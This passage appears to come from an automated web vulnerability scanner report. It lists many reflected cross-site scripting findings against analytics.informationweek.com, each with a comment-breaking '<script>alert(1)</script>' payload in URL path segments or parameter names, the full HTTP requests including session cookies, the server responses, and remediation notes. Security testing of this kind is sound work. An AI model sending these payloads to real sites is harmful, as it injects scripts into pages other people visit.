<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9cd1610281f%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.html?aa634--><script>alert(1)</script>9cd1610281f=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload ea5fc--><script>alert(1)</script>808f19a7df2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menuea5fc--><script>alert(1)</script>808f19a7df2/104/Government/Government.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:44:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:44:52 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... formationweek.com%2Fmenuea5fc--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E808f19a7df2%2F104%2FGovernment%2FGovernment.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menuea5fc--><script>alert(1)</script>808f19a7df2/104/Government/Government.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 2c544--><script>alert(1)</script>890b31067f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/1042c544--><script>alert(1)</script>890b31067f8/Government/Government.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:09 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:09 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ationweek.com%2Fmenu%2F1042c544--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E890b31067f8%2FGovernment%2FGovernment.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1042c544--><script>alert(1)</script>890b31067f8/Government/Government.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 505ac--><script>alert(1)</script>edbecabc005 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/104/Government505ac--><script>alert(1)</script>edbecabc005/Government.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:16 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... om%2Fmenu%2F104%2FGovernment505ac--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eedbecabc005%2FGovernment.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/104/Government505ac--><script>alert(1)</script>edbecabc005/Government.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 132d0--><script>alert(1)</script>52b1d0b102f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/104/Government/Government.html132d0--><script>alert(1)</script>52b1d0b102f HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2FGovernment%2FGovernment.html132d0--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E52b1d0b102f&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/104/Government/Government.html132d0--><script>alert(1)</script>52b1d0b102f"> ...[SNIP]...
3.55. http://analytics.informationweek.com/menu/104/Government/Government.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://analytics.informationweek.com
Path: /menu/104/Government/Government.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bf725--><script>alert(1)</script>b4e47d4b98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/104/Government/Government.html?bf725--><script>alert(1)</script>b4e47d4b98=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... nment%2FGovernment.html%3Fbf725--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb4e47d4b98%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/104/Government/Government.html?bf725--><script>alert(1)</script>b4e47d4b98=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 71898--><script>alert(1)</script>7193a7d29ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu71898--><script>alert(1)</script>7193a7d29ad/105/Healthcare/Healthcare.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:00 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... formationweek.com%2Fmenu71898--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7193a7d29ad%2F105%2FHealthcare%2FHealthcare.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu71898--><script>alert(1)</script>7193a7d29ad/105/Healthcare/Healthcare.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 54cf2--><script>alert(1)</script>109941c14ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/10554cf2--><script>alert(1)</script>109941c14ca/Healthcare/Healthcare.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:12 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ationweek.com%2Fmenu%2F10554cf2--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E109941c14ca%2FHealthcare%2FHealthcare.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/10554cf2--><script>alert(1)</script>109941c14ca/Healthcare/Healthcare.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload a6df7--><script>alert(1)</script>5ba8d7732fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/105/Healthcarea6df7--><script>alert(1)</script>5ba8d7732fd/Healthcare.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:19 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:19 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... om%2Fmenu%2F105%2FHealthcarea6df7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E5ba8d7732fd%2FHealthcare.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/105/Healthcarea6df7--><script>alert(1)</script>5ba8d7732fd/Healthcare.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload fec08--><script>alert(1)</script>8c1aeff968c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/105/Healthcare/Healthcare.htmlfec08--><script>alert(1)</script>8c1aeff968c HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2FHealthcare%2FHealthcare.htmlfec08--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8c1aeff968c&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.htmlfec08--><script>alert(1)</script>8c1aeff968c"> ...[SNIP]...
3.60. http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://analytics.informationweek.com
Path: /menu/105/Healthcare/Healthcare.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ecec8--><script>alert(1)</script>296d0d5c564 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/105/Healthcare/Healthcare.html?ecec8--><script>alert(1)</script>296d0d5c564=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... care%2FHealthcare.html%3Fecec8--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E296d0d5c564%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.html?ecec8--><script>alert(1)</script>296d0d5c564=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 35762--><script>alert(1)</script>26950b9f17e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu35762--><script>alert(1)</script>26950b9f17e/106/Financial/Financial.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 02:11:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 16:11:24 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45905
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... informationweek.com%2Fmenu35762--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E26950b9f17e%2F106%2FFinancial%2FFinancial.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu35762--><script>alert(1)</script>26950b9f17e/106/Financial/Financial.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload a80e4--><script>alert(1)</script>b9fe4f616f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/106a80e4--><script>alert(1)</script>b9fe4f616f3/Financial/Financial.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 02:11:33 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 16:11:33 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45905
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... rmationweek.com%2Fmenu%2F106a80e4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb9fe4f616f3%2FFinancial%2FFinancial.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/106a80e4--><script>alert(1)</script>b9fe4f616f3/Financial/Financial.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 3bdd8--><script>alert(1)</script>74351014ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/106/Financial3bdd8--><script>alert(1)</script>74351014ad/Financial.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 02:11:50 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 16:11:50 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45903
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ek.com%2Fmenu%2F106%2FFinancial3bdd8--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E74351014ad%2FFinancial.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/106/Financial3bdd8--><script>alert(1)</script>74351014ad/Financial.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 9221b--><script>alert(1)</script>bde86b314b0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/106/Financial/Financial.html9221b--><script>alert(1)</script>bde86b314b0 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 02:12:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 16:12:28 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45905
